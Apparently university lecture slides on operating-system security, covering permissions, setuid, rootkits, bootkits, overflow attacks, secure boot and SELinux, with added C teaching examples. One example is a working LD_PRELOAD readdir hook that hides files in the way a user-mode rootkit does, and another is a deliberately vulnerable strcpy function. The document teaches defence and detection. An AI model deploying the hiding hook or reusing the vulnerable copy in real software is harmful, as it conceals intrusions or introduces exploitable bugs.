Operating Systems Security (524870)
Computer Security & OS Lab, Dept. of Software Science, DKU
Cho, Seong-je (조성제)
Fall, 2018
sjcho at dankook.ac.kr
Many slides are taken from Google search results, the textbook (and its site), and web sites
• Textbook site
http://williamstallings.com/ComputerSecurity/
http://www.pearsonhighered.com/educator/academic/product/1,,0132775069,00.html
Many photos in this presentation are from Google Images or Wikipedia
524870, F’18- 3 -
Overview of the BIOS/MBR Boot Process
https://neosmart.net/wiki/mbr-boot-process/
Computer Security & OS Lab.
• Bootloader = Boot manager
Popular Bootloaders
NTLDR: NT Loader
Boot Process
https://neosmart.net/wiki/mbr-boot-process/
Windows Boot Process
http://www.blackhat.com/presentations/bh-usa-09/KLEISSNER/BHUSA09-Kleissner-StonedBootkit-SLIDES.pdf
What is an Operating System?
Operating Systems
• An operating system is a collection of software that manages computer hardware resources and provides common services for computer programs.
• The kernel provides the most basic level of control over all of the computer’s hardware devices.
• For security, the OS must be able to distinguish requests that should be allowed from requests that must be refused: every request is checked against who is making it and what it asks for.
Access Control: File Permissions
• File permissions (authorization): Readable / Writable / eXecutable by a user or a group of users
• In Unix-like OSes, a file’s permission bits form a small access matrix that shows who is allowed to do what to the file.
• A file has owner permissions (what the owning user may do), group permissions (what members of the file’s group may do), and world (“other”) permissions (the default for everyone else). The kernel picks exactly one of the three classes for a requester, owner first, then group, then other, and tests only that class’s bits; the classes are never combined.
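The one-class-at-a-time rule above is easy to get wrong when reasoning about permissions, so here is the check written out in C. This is an added example for these slides, not code from the deck or from any kernel: the struct names, the single-group helper, and the root shortcut (a stand-in for CAP_DAC_OVERRIDE) are this example's own simplifications, and POSIX ACLs are ignored.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/types.h>

/* Requested access bits, encoded like the "other" octet of st_mode. */
enum { PERM_R = 4, PERM_W = 2, PERM_X = 1 };

/* Who is asking: effective uid, effective gid plus supplementary groups. */
struct subject {
    uid_t uid;
    const gid_t *gids;
    size_t ngids;
};

/* What is being accessed: the fields of struct stat that the check reads. */
struct object {
    uid_t owner;
    gid_t group;
    unsigned mode;       /* low nine bits: rwx rwx rwx for owner, group, other */
};

static bool in_groups(const struct subject *s, gid_t g)
{
    for (size_t i = 0; i < s->ngids; i++)
        if (s->gids[i] == g)
            return true;
    return false;
}

/*
 * Discretionary access check for a regular file, as Unix kernels apply it:
 * exactly one permission class is selected (owner if the uid matches, else
 * group if any of the subject's gids matches, else other) and only that
 * class's bits decide. The classes are not unioned, so an owner whose file
 * is mode 0077 is refused read access even though "other" would be allowed.
 * Root (uid 0, CAP_DAC_OVERRIDE in Linux terms) bypasses read and write but
 * may execute only if at least one x bit is set. ACLs are ignored here.
 */
bool dac_permitted(const struct subject *s, const struct object *o, unsigned want)
{
    unsigned bits;

    if (s->uid == 0) {
        if ((want & PERM_X) && !(o->mode & 0111))
            return false;
        return true;
    }
    if (s->uid == o->owner)
        bits = (o->mode >> 6) & 7;
    else if (in_groups(s, o->group))
        bits = (o->mode >> 3) & 7;
    else
        bits = o->mode & 7;
    return (bits & want) == want;
}

/* Convenience wrapper for a subject with a single group (used by the demo below). */
bool dac_check(uid_t uid, gid_t gid, uid_t owner, gid_t group, unsigned mode, unsigned want)
{
    struct subject s = { uid, &gid, 1 };
    struct object o = { owner, group, mode };
    return dac_permitted(&s, &o, want);
}

int main(void)
{
    /* Constructed cases: uid 1000 owns the file, gid 100 is its group. */
    printf("owner rw on 0640 : %d\n", dac_check(1000, 100, 1000, 100, 0640, PERM_R | PERM_W));
    printf("owner r  on 0077 : %d\n", dac_check(1000, 100, 1000, 100, 0077, PERM_R));
    printf("group w  on 0640 : %d\n", dac_check(1001, 100, 1000, 100, 0640, PERM_W));
    printf("other r  on 0640 : %d\n", dac_check(1002, 200, 1000, 100, 0640, PERM_R));
    printf("root  x  on 0644 : %d\n", dac_check(0, 0, 1000, 100, 0644, PERM_X));
    return 0;
}
```

The 0077 case is the one to remember: a file the owner cannot read but everyone else can is a legal and occasionally intentional configuration, and a checker that ORs the three classes together gets it wrong.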
Access Control: File Permissions
Authorization on Windows 7
Access Control: File Permissions
• Android 2.2 defines 134 permissions
  ● such as dialing (CALL_PHONE) and taking pictures (CAMERA)
• The user is asked to accept the requested permissions at install time (the all-or-nothing install-time model; from Android 6.0 on, dangerous permissions are instead requested at run time)
Virtual Address Space of a Linux Process
Linux OS / Unix OS
• ID/Password
  /etc/passwd, /etc/shadow
• Special permissions: setuid, setgid, sticky bits
  setuid privileged programs
  Real User ID (RUID), Effective User ID (EUID)
  setuid(uid), seteuid(uid), setgid(), setegid()
  Library functions: system(const char *cmd), …
  System calls: execve( ), …
• Commands
  uname, chmod, passwd, su, chsh, setenv, …
• Race conditions: symlink race (a time-of-check/time-of-use window between a check such as access() and the open() that follows it)
• Audit log
  /var/log/{syslog, dmesg, messages, btmp, … }
  Commands: dmesg, last, …
• Environment variables
  LD_LIBRARY_PATH, LD_PRELOAD, … (the dynamic loader ignores them for setuid binaries)
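The setuid, RUID/EUID and setuid()/seteuid() items above are where privileged helpers usually go wrong: dropping the uid before the gid, or changing only the effective uid when the intent was to give root up for good. The C program below, added here and not part of the original slides, does a permanent drop in the safe order and then proves to itself that root cannot be regained. It uses the Linux/glibc calls setresuid/setresgid/getresuid/getresgid (an assumption: they are not POSIX); run as an ordinary user it simply re-asserts that user's ids, which is still a valid self-check.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Prototypes for the glibc extensions used, in case _GNU_SOURCE was not seen first. */
int setresuid(uid_t, uid_t, uid_t);
int setresgid(gid_t, gid_t, gid_t);
int getresuid(uid_t *, uid_t *, uid_t *);
int getresgid(gid_t *, gid_t *, gid_t *);

/*
 * Permanently give up the privileges of a setuid program. Returns 0 on
 * success, -1 with errno set if any step fails or if root could be regained.
 *
 * Order matters:
 *  1. supplementary groups and gid are dropped first, while euid is still 0
 *     (after the uid is dropped the process may no longer change them);
 *  2. all three uids (real, effective, saved) are set, so the saved uid
 *     cannot be used to call seteuid(0) later;
 *  3. the result is read back, and regaining root is attempted and must fail.
 */
int drop_privileges_permanently(uid_t target_uid, gid_t target_gid)
{
    uid_t ruid, euid, suid;
    gid_t rgid, egid, sgid;

    if (geteuid() == 0 && setgroups(0, NULL) != 0)   /* only root may clear the list */
        return -1;
    if (setresgid(target_gid, target_gid, target_gid) != 0)
        return -1;
    if (setresuid(target_uid, target_uid, target_uid) != 0)
        return -1;

    if (getresuid(&ruid, &euid, &suid) != 0 || getresgid(&rgid, &egid, &sgid) != 0)
        return -1;
    if (ruid != target_uid || euid != target_uid || suid != target_uid ||
        rgid != target_gid || egid != target_gid || sgid != target_gid) {
        errno = EPERM;
        return -1;
    }
    /* Defensive check: a non-root target must not be able to climb back. */
    if (target_uid != 0 && (setuid(0) == 0 || seteuid(0) == 0)) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

/*
 * Temporary drop: the real and saved uids stay, only the EUID changes, so a
 * later seteuid(saved uid) restores privilege. This is what a setuid helper
 * does around untrusted work, not what it should do before exec()ing anything.
 */
int drop_privileges_temporarily(uid_t unprivileged_uid)
{
    return seteuid(unprivileged_uid);
}

int main(void)
{
    printf("before: ruid=%u euid=%u\n", (unsigned)getuid(), (unsigned)geteuid());
    if (drop_privileges_permanently(getuid(), getgid()) != 0) {
        perror("drop_privileges_permanently");
        return 1;
    }
    printf("after : ruid=%u euid=%u\n", (unsigned)getuid(), (unsigned)geteuid());
    return 0;
}
```

A plain setuid(uid) called by a root process also sets all three ids on Linux, but seteuid(uid) does not, which is why a helper that "dropped root" with seteuid can be talked back into it by a later seteuid(0); checking getresuid after the drop catches both mistakes.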
What is Computer Security?
Which types of threats are there?
Threat Modeling
Risks or threats on the Internet and mobile platforms: the MS STRIDE model
• Spoofing: e.g., password cracking
• Tampering: altering information
• Repudiation: denying an action that was performed
• Information Disclosure: stealing information, packet capture, …
• Denial of Service (DoS): deleting information, crashing systems
• Elevation of Privilege: rooting, buffer overflow, …
Keyloggers – H/W & S/W
Rootkit
• root + kit: a program that hooks the system or modifies OS functionality
• Hides files, processes and other objects to conceal its presence
• Intercepts and alters the normal execution flow
• Some rootkits install themselves as device drivers
• It keeps access to a computer by subverting standard OS functionality or other applications.
• It is written for a specific OS and modifies that OS’s kernel (or, for a user-mode rootkit, its libraries and programs).
• Reinstalling the OS removes a rootkit embedded in the previous OS, but not one living in firmware or the boot sector (see firmware rootkits and bootkits below).
Rootkit
User-mode rootkit
Kernel-mode rootkit
Hybrid rootkit
Firmware rootkit
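A user-mode rootkit of the kind listed above hides files by hooking library functions instead of the kernel, and on Linux the LD_PRELOAD variable from the earlier Unix slide is the usual injection vector. The following C code is an added example for these slides (not from the deck, and not any real rootkit): it interposes readdir(3), forwards to the real libc implementation found with RTLD_NEXT, and drops every entry whose name begins with the constructed prefix rk_hidden_. The demo function builds a scratch directory under /tmp (an assumption about the environment) to show the effect without needing LD_PRELOAD; compiled as a shared object with -shared -fPIC -ldl and preloaded, the same hook hides those names from ls, find and anything else that lists directories through libc.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)   /* glibc's value, if _GNU_SOURCE was not seen first */
#endif

/* Entries whose names start with this prefix disappear. The prefix is this example's choice. */
#define HIDE_PREFIX "rk_hidden_"

typedef struct dirent *(*readdir_fn)(DIR *);

/*
 * Interposed readdir(3). Built into a shared object and injected with
 * LD_PRELOAD, this definition is found before libc's by every dynamically
 * linked program (ls, find, a file manager), so the hidden entries vanish
 * from their output. The real function is looked up with RTLD_NEXT and
 * used for everything except the names we want to suppress.
 * A real hook also covers readdir64, which is what 64-bit ls actually calls.
 */
struct dirent *readdir(DIR *dirp)
{
    static readdir_fn real_readdir;
    struct dirent *ent;

    if (!real_readdir) {
        real_readdir = (readdir_fn)dlsym(RTLD_NEXT, "readdir");
        if (!real_readdir)
            abort();
    }
    while ((ent = real_readdir(dirp)) != NULL) {
        if (strncmp(ent->d_name, HIDE_PREFIX, sizeof HIDE_PREFIX - 1) == 0)
            continue;                         /* swallow the entry */
        return ent;
    }
    return NULL;
}

/* Number of entries a caller of readdir() sees in path (including . and ..), -1 on error. */
int count_visible_entries(const char *path)
{
    DIR *d = opendir(path);
    int n = 0;

    if (!d)
        return -1;
    while (readdir(d) != NULL)
        n++;
    closedir(d);
    return n;
}

static int touch(const char *path)
{
    FILE *f = fopen(path, "w");
    if (!f)
        return -1;
    fclose(f);
    return 0;
}

/*
 * Constructed demo: a scratch directory holding one ordinary file and one
 * file with the hidden prefix. Returns what a directory listing reports:
 * ".", ".." and "visible.txt" make 3; the hidden file is not counted even
 * though it exists (unlink() below removes it by path, unaffected by the hook).
 */
int demo_hidden_listing(void)
{
    char dir[] = "/tmp/rkdemo.XXXXXX";
    char vis[64], hid[64];
    int n;

    if (!mkdtemp(dir))
        return -1;
    snprintf(vis, sizeof vis, "%s/visible.txt", dir);
    snprintf(hid, sizeof hid, "%s/" HIDE_PREFIX "loot", dir);
    if (touch(vis) != 0 || touch(hid) != 0)
        return -1;
    n = count_visible_entries(dir);
    unlink(vis);
    unlink(hid);
    rmdir(dir);
    return n;
}

int main(void)
{
    printf("entries visible through hooked readdir: %d (expected 3)\n", demo_hidden_listing());
    return 0;
}
```

Detection follows from the same mechanism: compare what readdir() reports with what the raw getdents64 system call returns, or stat() a name that the listing does not show; a statically linked tool bypasses the preload entirely, and /etc/ld.so.preload is the persistence location to check.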
Bootkit threat
• bootkit = boot + rootkit
• It is loaded at startup directly by the BIOS, from the boot sector, before the OS is loaded.
• It is independent of any OS.
• It is more subtle and harder to detect than an OS-level rootkit.
• Infection points: MBR (Master Boot Record), VBR (Volume Boot Record), IPL (Initial Program Loader)
Privilege Escalation Attacks
https://en.wikipedia.org/wiki/Privilege_escalation
Privilege Escalation Attacks
Control hijacking attacks
• Buffer overflow attacks in the stack, data, and heap sections
• Code-injection attacks
• Code-reuse attacks
• Integer overflow attacks
• Format string vulnerabilities
• Double free on the heap
• Use after free
• Return-to-libc (ret2libc)
• Return-Oriented Programming (ROP)
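To make the first items on the list concrete, the C code below places the unbounded strcpy that produces a stack overflow next to a bounded copy that reports truncation, and adds the overflow-checked size computation that stops an integer overflow from turning into a heap overflow. It is an added example written for these slides, not code from the deck; the 16-byte NAME_MAX_LEN and the helper names are this example's own, and __builtin_mul_overflow assumes GCC or Clang.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_MAX_LEN 16

/*
 * VULNERABLE (kept as the slides describe it, do not use): strcpy stops at the
 * terminating NUL of the source, never at the end of the destination. Input of
 * 16 bytes or more runs past `name` into the saved frame pointer and return
 * address, which is exactly the write that ret2libc and ROP chains use to take
 * control flow. Stack canaries, NX and ASLR make this harder to exploit; only
 * the bound removes it.
 */
void greet_vulnerable(const char *input)
{
    char name[NAME_MAX_LEN];
    strcpy(name, input);
    printf("hello, %s\n", name);
}

/*
 * HARDENED: copy at most dstsz-1 bytes, always NUL-terminate, and tell the
 * caller when input was cut. (A plain strncpy silently leaves the buffer
 * unterminated when the source is too long, so it is not a fix by itself.)
 * Returns true if the whole string fit.
 */
bool copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n;

    if (dstsz == 0)
        return false;
    n = strnlen(src, dstsz);          /* never reads more than dstsz bytes of src */
    if (n == dstsz) {                 /* source is dstsz bytes or longer */
        memcpy(dst, src, dstsz - 1);
        dst[dstsz - 1] = '\0';
        return false;
    }
    memcpy(dst, src, n + 1);          /* includes the NUL */
    return true;
}

bool greet_hardened(const char *input)
{
    char name[NAME_MAX_LEN];
    bool fit = copy_bounded(name, sizeof name, input);
    printf("hello, %s%s\n", name, fit ? "" : " (truncated)");
    return fit;
}

/* Length of the string copy_bounded leaves in a dstsz-byte buffer (dstsz <= 64). */
size_t bounded_result_len(size_t dstsz, const char *src)
{
    char buf[64];
    if (dstsz > sizeof buf)
        return 0;
    copy_bounded(buf, dstsz, src);
    return strlen(buf);
}

/*
 * Integer overflow as a memory-corruption primitive: count * elem_size wraps,
 * malloc returns a small block, and the loop that fills it writes past the
 * end (a heap overflow). Check the multiplication before it reaches malloc.
 */
bool array_bytes_fit(size_t count, size_t elem_size, size_t *bytes)
{
    return !__builtin_mul_overflow(count, elem_size, bytes);
}

void *alloc_array_checked(size_t count, size_t elem_size)
{
    size_t bytes;
    if (!array_bytes_fit(count, elem_size, &bytes))
        return NULL;                  /* refuse instead of allocating a wrapped size */
    return malloc(bytes);
}

bool alloc_would_wrap(size_t count, size_t elem_size)
{
    size_t bytes;
    return !array_bytes_fit(count, elem_size, &bytes);
}

int main(void)
{
    greet_hardened("alice");
    greet_hardened("a-name-far-longer-than-sixteen-bytes");
    printf("SIZE_MAX/2 * 4 wraps: %d\n", alloc_would_wrap(SIZE_MAX / 2, 4));
    return 0;
}
```

Compiling the vulnerable version with -fstack-protector-strong makes the overflow abort at function return instead of returning into attacker-chosen code; that is detection after the fact, which is why the bounded copy is still the fix.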
Escalation of Privilege
• Rooting
  How to root your Android phone or tablet (and unroot it)
  TowelRoot v3, v4, … by Geohot
• How to detect a rooted device on Android
In-memory attacks
• Memory dump
• DMA attack: an attacker with a DMA-capable tool can dump the entire memory
  Interfaces such as PCI Express and Thunderbolt are vulnerable
• Memory disclosure attack (countered by memory sanitization: wiping secrets as soon as they are no longer needed)
• Core dump analysis
• Cold boot attack: boot a stolen device into an attacker-controlled OS that outputs the memory contents (DRAM keeps its contents for a short time after power loss)
Anatomy of a Ransomware Attack
• Ransomware: a type of malware that prevents or limits users from accessing their system, either by locking the system’s screen or by locking (encrypting) the users’ files, unless a ransom is paid.
Fileless ransomware: Sorebrect
1. Email arrival (with attachment)
2. Entry to the desktop (the document is opened and the macro runs in memory)
3. Memory access (a PowerShell script and an additional script are executed in memory, and the encryption key is downloaded)
4. Data encryption
5. Bad news (the ransom note)
https://www.safaribooksonline.com/library/view/ransomware/9781491967874/ch01.html
http://www.redlambda.com/blog/understanding-sorebrecht-ransomware
OS Security
Threats (STRIDE) vs. CIA
Threats
• Repudiation: “I didn’t send that email,” “I didn’t visit that web site,” …
• Rootkits, rooting (jailbreaking), …
Properties
• Confidentiality: data cannot be disclosed to unauthorized individuals / systems
• Integrity: data cannot be modified undetectably
• Availability: data must be available when needed
Forensics

Threat                    Property violated
Spoofing identity         Authentication, Authenticity
Tampering with data       Integrity
Repudiation               Auditing (non-repudiation)
Information Disclosure    Confidentiality
Denial of Service         Availability
Elevation of Privilege    Authorization
The STRIDE model describes threats as violations of these six security properties.
Secure Boot
Before loading software, verify that
• it came from the OEM (the image is signed with a key the platform trusts), and
• it has not been tampered with (the signature still verifies over the image).
A hardware TPM or TEE can provide
• protected key storage
• protected signature storage
• signature generation
Secure Boot
• Root of Trust: TPM (Trusted Platform Module)
• MTM (Mobile Trusted Module)
• ARM TrustZone
• Trusted Execution Environment (TEE)
• Windows 8 Secure Boot
On screen keyboard, Virtual keyboard
Authentication
Samsung Galaxy Note 7
• The Galaxy Note 7 was Samsung’s best smartphone to date (2016)
• Iris scanner
  Biometric data cannot be changed if it leaks, unlike a password
  » The templates need secure storage (a trusted zone)
• Galaxy Note 7 explosion
• Galaxy Note 7 recall
  “Samsung recalls Note 7 flagship over explosive batteries” – BBC News
Preventing Hijacking Attacks
• Rewrite the software in a type-safe language (Java, ML)
• LibSafe
• StackGuard, StackShield (stack canaries)
• Control Flow Integrity (CFI)
• Marking memory as non-executable
  DEP (Data Execution Prevention) on MS Windows
  Writable XOR eXecutable (W^X)
  NX bit on AMD Athlon 64
  XD bit on Intel P4 Prescott
  PaX project on Linux
• ASLR (Address Space Layout Randomization)
Filesystem-level encryption
• Encrypting File System (EFS) on Microsoft Windows
• eCryptfs (Enterprise Cryptographic Filesystem)
  A package of disk encryption software for Linux
• ext4 native encryption, added in Linux kernel 4.1 (June 2015)
• Secure USB
  Encrypted USB flash drives
SELinux: /etc/{passwd, shadow}, /usr/bin/passwd
Trusted Execution Environment (TEE)
• TEE: a secure area of the main processor.
• It guarantees that code and data loaded inside it are protected with respect to confidentiality and integrity.
• ARM TrustZone
• Rich Execution Environment (REE): the normal world, where the regular OS and its apps run alongside the TEE
Samsung Knox
an enterprise mobile security solution pre-installed in most of Samsung's smartphones, tablets, and wearables
It provides security features that enable business and personal content to coexist on the same handset.
Securing the “BYOD (Bring Your Own Device)” paradigm
Trusted Boot using TIMA
TIMA = TrustZone-based Integrity Measurement Architecture
Real-Time Kernel Protection (RKP)
OS Security (from techopedia.com)
• The process of ensuring OS integrity, confidentiality and availability
• OS security refers to specified steps or measures used to protect the OS from threats, viruses, worms, malware or remote hacker intrusions.
• OS security encompasses all preventive-control techniques, which safeguard any computer assets capable of being stolen, edited or deleted if OS security is compromised.
• OS security allows different applications and programs to perform required tasks and stops unauthorized interference.
• OS security may be approached in many ways, including adherence to the following:
  Performing regular OS patch updates
  Installing updated antivirus engines and software
  Scrutinizing all incoming and outgoing network traffic through a firewall
  Creating secure accounts with required privileges only (i.e., user management)
SELinux (Security Enhanced Linux)
SELinux features (source: http://drsalbertspijkers.blogspot.kr/2013/06/linux-kernel-security-it-is-necessary.html)
1. Clean separation of policy from enforcement
2. Well-defined policy interfaces
3. Support for applications querying the policy and enforcing access control
4. Independent of specific policies and policy languages
5. Independent of specific security label formats and contents
6. Individual labels and controls for kernel objects and services
7. Caching of access decisions for efficiency
8. Support for policy changes
9. Separate measures for protecting system integrity (domain-type) and data confidentiality (multilevel security)
10. Very flexible policy
11. Controls over process initialization and inheritance and program execution
12. Controls over file systems, directories, files, and open file descriptors
13. Controls over sockets, messages, and network interfaces
14. Controls over use of "capabilities"
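Several of the fourteen features above (1, 3, 7, 8 and default deny) are visible in a few dozen lines once the policy is treated as data and enforcement as a lookup. The C code below is an added example for these slides, not SELinux source: a constructed type-enforcement policy of four allow rules for a single "file" class, a security-server function that computes the access vector, and an access vector cache (AVC) in front of it that counts hits and misses and is flushed on policy reload. Type names such as httpd_t and shadow_t are borrowed from the reference policy for familiarity; the rules themselves, the permission bits and the hash are this example's own.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* One type-enforcement rule:  allow <source type> <target type>:<class> { perms }; */
struct allow_rule { const char *stype, *ttype, *cls; unsigned perms; };

/* Permission bits for the "file" class in this example; a real policy has dozens of classes. */
enum { P_READ = 1, P_WRITE = 2, P_EXEC = 4, P_GETATTR = 8 };

/* Constructed policy. The policy is pure data; the functions below are the enforcement
 * point, which is the "clean separation of policy from enforcement" the slide lists. */
static const struct allow_rule policy[] = {
    { "httpd_t",  "httpd_sys_content_t", "file", P_READ | P_GETATTR },
    { "httpd_t",  "httpd_log_t",         "file", P_WRITE | P_GETATTR },
    { "passwd_t", "shadow_t",            "file", P_READ | P_WRITE | P_GETATTR },
    { "user_t",   "bin_t",               "file", P_READ | P_EXEC | P_GETATTR },
};
#define NRULES (sizeof policy / sizeof policy[0])

/* Security server: union of every matching allow rule; no match means nothing is allowed. */
static unsigned compute_av(const char *stype, const char *ttype, const char *cls)
{
    unsigned allowed = 0;
    for (size_t i = 0; i < NRULES; i++)
        if (!strcmp(policy[i].stype, stype) && !strcmp(policy[i].ttype, ttype) &&
            !strcmp(policy[i].cls, cls))
            allowed |= policy[i].perms;
    return allowed;
}

/* Access vector cache (AVC): one policy walk per (source, target, class), then cached
 * decisions. Entries keep pointers to the caller's type strings (string literals here). */
#define AVC_SLOTS 64
struct avc_entry { const char *stype, *ttype, *cls; unsigned allowed; bool valid; };
static struct avc_entry avc[AVC_SLOTS];
static unsigned avc_hits, avc_misses;

static unsigned hash_key(const char *stype, const char *ttype, const char *cls)
{
    unsigned h = 5381;
    const char *parts[3] = { stype, ttype, cls };
    for (int i = 0; i < 3; i++)
        for (const char *s = parts[i]; *s; s++)
            h = h * 33 + (unsigned char)*s;
    return h % AVC_SLOTS;
}

static bool same_key(const struct avc_entry *e, const char *stype, const char *ttype, const char *cls)
{
    return e->valid && !strcmp(e->stype, stype) && !strcmp(e->ttype, ttype) && !strcmp(e->cls, cls);
}

/* The hook a kernel object manager calls: may a subject of type stype perform `want` on a
 * ttype object of class cls? Denials are logged in the style of an AVC audit message. */
bool avc_has_perm(const char *stype, const char *ttype, const char *cls, unsigned want)
{
    struct avc_entry *e = &avc[hash_key(stype, ttype, cls)];
    bool ok;

    if (same_key(e, stype, ttype, cls)) {
        avc_hits++;
    } else {
        avc_misses++;
        *e = (struct avc_entry){ stype, ttype, cls, compute_av(stype, ttype, cls), true };
    }
    ok = (e->allowed & want) == want;
    if (!ok)
        fprintf(stderr, "avc: denied { 0x%x } scontext=%s tcontext=%s tclass=%s\n",
                want & ~e->allowed, stype, ttype, cls);
    return ok;
}

/* A policy reload must drop cached decisions, otherwise the old rules keep being enforced. */
void avc_reset(void) { memset(avc, 0, sizeof avc); avc_hits = avc_misses = 0; }
unsigned avc_hit_count(void) { return avc_hits; }
unsigned avc_miss_count(void) { return avc_misses; }

int main(void)
{
    avc_reset();
    printf("httpd_t read content : %d\n", avc_has_perm("httpd_t", "httpd_sys_content_t", "file", P_READ));
    printf("httpd_t write content: %d\n", avc_has_perm("httpd_t", "httpd_sys_content_t", "file", P_WRITE));
    printf("httpd_t read shadow  : %d\n", avc_has_perm("httpd_t", "shadow_t", "file", P_READ));
    printf("avc hits=%u misses=%u\n", avc_hit_count(), avc_miss_count());
    return 0;
}
```

The third query is the one SELinux exists for: a web server running as root with DAC alone can read /etc/shadow, but with type enforcement the absence of an allow rule from httpd_t to shadow_t is a denial regardless of uid, and the audit line is the signal an operator sees.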
SELinux
Pros and cons
Admin skill set (learning curve)               High
Complex and powerful access control mechanism  Yes
Detailed configuration required                Yes
GUI tools to write / modify rule sets          Yes
CLI tools to write / modify rule sets          Yes
Ease of use                                    No (often described as horrible to use)
Binary package                                 Available for most Linux distributions
System performance impact                      None (in practice a small overhead, kept low by the access vector cache)
Security framework                             Mandatory access control using Flask
Auditing and logging supported                 Yes
Typical user base                              Enterprise users
Documentation                                  Well documented
* Source: Linux Kernel Security (it is necessary)
SELinux / AppArmor / Grsecurity
New user / ease of use : Grsecurity
Easy to understand policy and tools : AppArmor
Most powerful access control mechanism : SELinux
Security Enhancements for Android
SE for Android (http://selinuxproject.org/page/SEAndroid)
Security Enhancements for Android™ (SE for Android) is a project to identify and address critical gaps in the security of Android.
Initially, the project is enabling the use of SELinux in Android in order to limit the damage that can be done by flawed or malicious apps and in order to enforce separation guarantees between apps. However, the scope of the project is not limited to SELinux.
SE for Android also refers to the reference implementation produced by the project. The current reference implementation provides a worked example of how to enable and apply SELinux at the lower layers of the Android software stack and provides a working demonstration of the value provided by SELinux in confining various root exploits and application vulnerabilities.
Android 4.3 is the first Android release to fully include and enable the SELinux support contributed by the SE for Android project.
Lab Exercises (Hands-on experience)
Topics for practical training
• Password cracking
• SELinux – Mandatory Access Control (MAC)
• Buffer Overflow (BoF) + Return to Library (ret2libc)
  Lord of Buffer Overflow (LoB)
• PLT/GOT (procedure linkage table / global offset table) overwrite
• Rootkit, TowelRoot v3/v4
• Backdoor
• Threats and protections associated with shared libraries
• Packet capture using Wireshark
• …
What is Computer Security?
Allow intended use of computer systems
Prevent unintended use that may cause harm
Protect information and systems from security threats
Make a Difference
Learn About Security
How Can You Make a Difference?
• Be a more security-aware user
  Make better security decisions
• Be a more security-aware developer
  Design and build more secure code and systems
• Be a more security-aware tester (defender)
• Be a security practitioner and researcher
  Identify security issues
  Propose new security solutions
Kali Linux
• A Debian-derived Linux distribution designed for digital forensics and penetration testing
• “The most advanced penetration testing distribution, ever.” (https://www.kali.org/ )
• https://en.wikipedia.org/wiki/Kali_Linux
• Kali Linux has over 600 preinstalled penetration-testing programs, including
  Armitage (a graphical cyber attack management tool),
  Nmap (a port scanner),
  Wireshark (a packet analyzer),
  John the Ripper (a password cracker),
  Aircrack-ng (a software suite for penetration-testing wireless LANs),
  Burp Suite and OWASP ZAP (web application security scanners).
War game sites (Training grounds)
Domestic (Korea)
• Online information security training ground (정보보호기술온라인훈련장):
  http://www.sis.or.kr/ → Training space
  Challenge: http://www.simples.kr/ → Community challenge reports
• Hacker School
  http://www.hackerschool.org/Sub_Html/HS_Community/index.html → Playground
  Free Training Zone (FTZ)
  Lord of Buffer Overflow (LoB)
International
• Internet Security & Challenges (Net Force): http://www.net-force.nl/ <challenges>
• Hack This Site! -- http://www.hackthissite.org/
• Reversers’ playground (CrackMe site): http://crackmes.de/
  A great site for testing your reversing skills
• Think Devise Hack (tdhack.com): many challenges, including cryptographic riddles, hackmes, and software applications to crack for both Windows and Linux
Security Jobs
Specific specialty areas & work roles
in the security industry
The 7 Types of Security Jobs, According to NIST
1. Securely provision
   Risk management, software development, systems architecture, technology R&D, …
2. Operate and maintain
   Data administration, knowledge management, network services, systems administration, systems analysis
3. Oversee and govern
   Training and education, cybersecurity management, strategic planning and policy, acquisition and program/project management
4. Collect and operate
   Collection operations, cyber operational planning
5. Protect and defend
   Cyber defense analysis, incident response, vulnerability assessment and management, …
6. Analyze
   Threat analysis, exploitation analysis, all-source analysis, …
7. Investigate
   Digital forensics
“Summary of the 7 security job categories selected by NIST (US)” – https://www.boannews.com/media/view.asp?idx=52310
The 20 Coolest Jobs in Information Security
#1 Information Security Crime Investigator/Forensics Expert
#2 System, Network, and/or Web Penetration Tester
#3 Forensic Analyst
#4 Incident Responder
#5 Security Architect
#6 Malware Analyst
#7 Network Security Engineer
#8 Security Analyst
#9 Computer Crime Investigator
#10 CISO/ISO or Director of Security
#11 Application Penetration Tester
#12 Security Operations Center Analyst
#13 Prosecutor Specializing in Information Security Crime
#14 Technical Director and Deputy CISO
#15 Intrusion Analyst
#16 Vulnerability Researcher/ Exploit Developer
#17 Security Auditor
#18 Security-savvy Software Developer
#19 Security Maven in an Application Developer Organization
#20 Disaster Recovery/Business Continuity Analyst/Manager
Source: SANS, http://www.sans.org/20coolestcareers/
Security Job Categories Project
Source: http://www.boannews.com/media/view.asp?idx=37409&kind=0
Security consultant
Must read the flow of management and converged-security trends on the basis of security technology
[Interview] Lee Sang-hoon, Team Leader, Consulting Business Division Team 2, IGLOO Security
Malware analyst
Patience and concentration are essential for the grueling fight against malicious code
[Interview] Han Chang-gyu, Team Leader, ASEC Analysis Team 1 & Kim A-young, Researcher
Penetration testing specialist
Surprised at how easily it was breached? That is the reality of corporate security!
[Interview] Kwak Gyu-bok, Deputy General Manager & Park Tae-seok, Manager, LG CNS Security Consulting Team
Security technical sales
Take the challenge if you want technical depth together with a business mindset
[Interview] Park Hyeong-geun, Senior Manager, IBM Korea / operator of the security community SecurityPlus
Security monitoring (SOC) analyst
Running on the front line of 24/7, 365-day hacking response for the safety of the cyber world
[Interview] Kim Jong-hyun, Security Monitoring Team Leader, SK Infosec
…
Certification
• CCNA Security Certification
  Cisco Certified Network Associate Security (CCNA Security)
  http://www.cisco.com/web/learning/certifications/associate/ccna_security/
• CISSP (Certified Information Systems Security Professional)
  https://www.isc2.org/CISSP/Default.aspx
  The CISSP exam is based on domains including access control, telecommunications and network security, software development security, and operations security
  MGT414: SANS +S Training Program for the CISSP® Certification Exam
• CISA (Certified Information Systems Auditor)
  http://www.isaca.org/Certification/CISA-Certified-Information-Systems-Auditor/Pages/default.aspx?utm_source=multiple&utm_medium=multiple&utm_content=friendly&utm_campaign=cisa
• GIAC Information Security Professional (GISP)
  http://www.giac.org/certification/information-security-professional-gisp
Certificate / License (of qualification)
Information Security Engineer (정보보안기사), a Korean national technical qualification in information security
• Written test:
